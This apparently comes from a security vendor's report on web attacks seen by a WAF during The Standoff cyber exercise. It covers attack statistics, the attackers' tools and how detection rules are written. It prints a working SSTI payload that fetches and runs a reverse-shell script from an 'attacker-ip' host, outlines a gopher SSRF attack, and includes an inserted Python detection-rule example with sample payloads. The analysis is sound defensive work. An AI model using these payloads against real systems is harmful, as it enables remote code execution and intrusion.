WAF Verdict, or What Happened to Web Resources of Companies’ Digital Twins at The Standoff

At the last The Standoff, we, the PT Expert Security Center team, monitored the infrastructure of the venue and the individual offices of the digital copy of the metropolis deployed on our cyber polygon, in parallel with the participants on the defending side. For this we deployed an additional security operations center (SOC) that, as it were, covered the entire infrastructure, so it “saw” all the activity of The Standoff participants and even a little more. One of the tools of this SOC was PT Application Firewall, a web application firewall (for the results of another of our SOC’s tools, PT Sandbox, see one of our previous articles). Below we focus exclusively on what was happening at the venue from the web point of view and on which targets the attacking teams chose.

General attack statistics

As part of The Standoff, we monitored attacks on the portal of the venue itself, as well as on 30 web resources included in the gaming infrastructure of the training ground. These were resources used both in the main game (Meters of the 25 Hours office, a resource for submitting meter readings, and Consul for Nuft, a service management platform, both discussed below) and in the bug bounty (for example, CMS Umbraco for Bank of FF, Mantis Bugtracker for 25 Hours, a bug tracking system for software products, and rConfig, a network configuration management service, for Big Bro Group). Red teams received points for implementing risks, as well as for finding vulnerabilities in systems and reporting them.

Who was who in the cyber polygon:

– Heavy Ship Logistics – the company that operated the airport, railway station, seaport;

– 25 Hours – a company that managed an amusement park, a business center, a traffic light network;

– Tube – a company that managed a TV and radio company, a gas distribution station, a transformer substation;

– Nuft – an organization in charge of an oil field and a petrochemical plant;

– Big Bro Group – power station;

– Bank of FF – bank.

Resources were evenly distributed between sites, both in terms of complexity and purpose. In particular, the applications participating in the bug bounty, each having two interfaces and facing the internal network of the virtual office, were the entry point for implementing risks within the companies of the digital city. There were 13 such applications, and for six of them the bug bounty goal was meant to be achieved from inside the office infrastructure. The rest of the applications were “dead ends”, that is, single end targets with fairly simple tasks to exploit various vulnerabilities (for example, the well-known RCE in Flack or BookStore SQL Injection, often proposed for solution in capture the flag). We monitored all these portals and applications in monitoring mode only and recorded attacks on 29 of the 30 web applications available in the infrastructure (one of the resources allowed logical attacks that could only be carried out from the bank’s network). The only defense the defenders had was the web application firewall.

The Standoff portal was also launched behind PT Application Firewall, but in blocking mode, in order to prevent possible attacks from the Internet on the infrastructure supporting the event.

Figure 1. Distribution of attacks by game days

Fig. 1 shows the distribution of attacks by game day. Gray indicates rules generated specifically for the event, yellow low-severity attacks, orange medium, and red high. The last category usually points to specific commands being run on the attacked node or to exploited vulnerabilities. The same colors are used below.

The list of the most frequently performed attacks is given below (the number of attacks is given for the entire period of The Standoff, from 12:00 on November 12 to 14:00 on November 17).

Figure 2. List of the most common attacks

The real picture of the attacks carried out and the monitoring results obtained in PT Application Firewall differ, for example because vulnerabilities in some applications were exploited from inside the perimeter, from the internal addresses of the defended office. Such attacks can be detected by internal audit tools. In addition, in any of the applications, attacks other than those intended for the game could be used if the final goal was not to exploit the ultimate vulnerability. Data on such attacks may not be fully recorded and may not be reflected in the logs.

Most often, attackers targeted applications of the Tube and Bank of FF offices: CMS Made Simple (CMS), bbord (virtual photo gallery), CMS Umbraco, PrestaShop (e-commerce site), AVideo encoder (video decoding resource), FHEM on Tomcat (smart home system), Consul, OpenEMR (electronic health record), ATutor (learning management system) and rConfig.

How to open doors to infrastructure via the web

During the monitoring, we analyzed the tools the attackers used to breach the perimeter. Along with traditional port scanning with nmap and tools like Burp Suite, self-written scripts in Python and Go were very popular: they made up almost a quarter of the tools used and were often built on top of tools already available to attackers, such as Metasploit. Applications on the defenders’ perimeters were actively fuzzed using the built-in Burp Suite modules, modules for Metasploit, and the Responder toolkit.

Of the 30 tasks laid out on the perimeter, all tasks of low complexity were solved, 5 of 6 of medium complexity and 2 of 6 of advanced complexity. Tasks of medium and high complexity are of the greatest interest, since they lead to an entry point into the infrastructure for further implementation of risks and, of course, allow teams to score the highest number of points.

Here are some examples of the most interesting tasks.

The task “Entering the perimeter of the city management company 25 Hours” was implemented through the Meters application. This is a site deployed to submit water and electricity meter readings online. The application uses expressions in the HubL template language, where {{ }} delimits an expression: anything inside the curly braces is evaluated and replaced with the resulting value during processing. The attack proceeds as follows: the vulnerability is first probed with a vector such as {{7*7}}, which in fact causes the calculation 7*7 to be performed.

Figure 3. Server Side Template Injection (SSTI) detection in PT Application Firewall for Meters application (detection rule adapted to The Standoff)
Figure 4. Distribution of SSTI attacks for the Meters application

To carry out a real attack, the following request has to be sent to the application’s front end:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder("cmd.exe","/c","powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.

This was done by two of the attacking teams.

This attack is interesting from the point of view that it can serve as a starting point for the implementation of vectors in an amusement park of a digital city (for example, to change the rotation speed of the Ferris wheel), in the city as a whole (to disrupt the traffic light network), or to steal personal data of citizens …

Another interesting task is the attack on Nuft implemented through the Consul application. The externally exposed service hosted software for bypassing blocking. Using it, a Server Side Request Forgery attack can be carried out over the Gopher protocol, with the request sent using the PUT method to the port the service listens on.

The status 200 received after the manipulation indicates a successful attack.

Figure 5. Attack on the Consul application (RCE).

Gaining access to this node and establishing persistence on it made it possible to carry out attacks on such objects of the digital city as the oil field (an example target is the technological process of transporting oil products to storage facilities) or the petrochemical plant (an example target is the chemical production processes).

To detect some types of attacks and identify the exploited vulnerabilities, we tuned the responses (eliminating false positives) and wrote additional attack detection rules. Let’s consider the principles of writing such rules.

To record and identify the main types of attacks, the proof of concept for each attack is examined, noting the path through which the attack is carried out. The rule is then formed on the basis of that path and of the parameter into which the particular combination of characters, link or code is injected.

For example, CMS Umbraco (used in the infrastructure of the Bank of FF company) has a vulnerability that is exploited by an authenticated user using the POST method; by recording the exploitation path and the exploitation parameters, the attack was captured.

Figure 6. The rule for detecting an attack in web traffic for CMS Umbraco

It is easy to guess that for Meters, whose attack was described above, a rule is formed in the same way from the input described earlier: the interpretation and execution of commands in curly braces in one of three parameters.

Figure 7. Rule for detecting attacks on Meters for commands executed by the interpreter in {}

A condition on the target application and the request path is added when the rule must be limited to a specific path.
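To make the rule-writing principle above concrete, here is an added example (not PT Application Firewall code and not from the original article) of a small path-and-parameter-scoped rule engine evaluated against constructed requests. It models the two detections the article describes: the SSTI probe and command execution in curly braces for Meters (the rule is restricted to a hypothetical /meters/submit path and three parameter names, which are assumptions), and a gopher:// scheme in any parameter as a sign of the SSRF vector used against Consul. The sample requests, paths and parameter names are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple, List
from urllib.parse import urlsplit, parse_qs


@dataclass
class Rule:
    """One WAF-style detection rule: a pattern scoped to a path and parameter names."""
    name: str
    severity: str                       # "low" | "medium" | "high"
    pattern: "re.Pattern[str]"
    path: Optional[str] = None          # only fire on this request path when set
    params: Tuple[str, ...] = ()        # only inspect these parameters when non-empty


@dataclass
class Request:
    """Minimal HTTP request model: method, URL (path + query) and form body."""
    method: str
    url: str
    body: str = ""

    def split(self):
        """Return (path, {param: [values]}) with query and body parameters merged."""
        parts = urlsplit(self.url)
        merged = parse_qs(parts.query, keep_blank_values=True)
        for key, values in parse_qs(self.body, keep_blank_values=True).items():
            merged.setdefault(key, []).extend(values)
        return parts.path, merged


# Hypothetical rule set; path and parameter names are assumptions for the example.
RULES = [
    # Arithmetic inside {{ }}: the classic probe such as {{7*7}} from the article.
    Rule("ssti_probe", "medium",
         re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}"),
         path="/meters/submit", params=("account", "reading", "comment")),
    # Java reflection / process execution inside {{ }}, as in the real Meters payload.
    Rule("ssti_java_exec", "high",
         re.compile(r"\{\{.*(ScriptEngineManager|ProcessBuilder|getRuntime).*\}\}", re.S),
         path="/meters/submit"),
    # gopher:// in any parameter on any path: the SSRF transport used against Consul.
    Rule("ssrf_gopher", "high", re.compile(r"(?i)gopher://")),
]


def evaluate(req: Request, rules=RULES) -> List[Tuple[str, str, str]]:
    """Return (rule name, severity, parameter) for every rule that fires on the request."""
    path, params = req.split()
    hits = []
    for rule in rules:
        if rule.path is not None and path != rule.path:
            continue                    # path condition not met: rule does not apply
        for name, values in params.items():
            if rule.params and name not in rule.params:
                continue                # parameter outside the rule's scope
            if any(rule.pattern.search(v) for v in values):
                hits.append((rule.name, rule.severity, name))
                break                   # report each rule once per request
    return hits


# Constructed sample traffic (not real captures from The Standoff).
SAMPLE_REQUESTS = [
    Request("POST", "/meters/submit", "account=1001&reading=2371"),
    Request("POST", "/meters/submit", "account=1001&reading={{7*7}}"),
    Request("POST", "/meters/submit",
            "account=1001&reading={{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance()}}"),
    Request("GET", "/about?q={{7*7}}"),                       # probe outside the scoped path
    Request("PUT", "/consul/render?target=gopher://127.0.0.1:8500/"),
]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.method, req.url, "->", evaluate(req) or "clean")
```

The path condition is what keeps the probe rule from firing on the /about request, which is the point of scoping a rule to the application and path where the proof of concept actually works; the gopher rule is deliberately unscoped because the scheme itself is suspicious anywhere. Note that parse_qs decodes “+” as a space, so a probe like {{7+7}} must be sent URL-encoded (%2B) to survive parsing, which is one reason real WAF rules normalize input before matching.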

In the course of this analysis of application vulnerabilities, about 30 rules were prepared in advance. These rules take the general trend into account, but do not always cover every way of implementing an attack on a particular application. In addition to the known and predetermined attack vectors, workarounds are often used. For example, instead of exploiting a vulnerability on the perimeter to obtain data from the database, the attackers gained access via an alternative protocol already inside the network (ODBC) or made a backup and “pulled” it out through administrative shared folders.


We see that attackers (including those at The Standoff) often use attacks on applications published on the perimeter to gain initial access and establish a foothold in the infrastructure. The main means of protecting such applications are solutions of the web application firewall class. At the cyber polygon, PT Application Firewall showed its effectiveness in tracking various attacks on the perimeter, including by allowing us to create our own rules for tracking attacks. Thanks to the user-friendly interface and the display of both requests and application responses, the product allowed us to filter out false positives effectively, as well as to assess the range of tools used by attackers.

Positive Technologies (PT Expert Security Center)
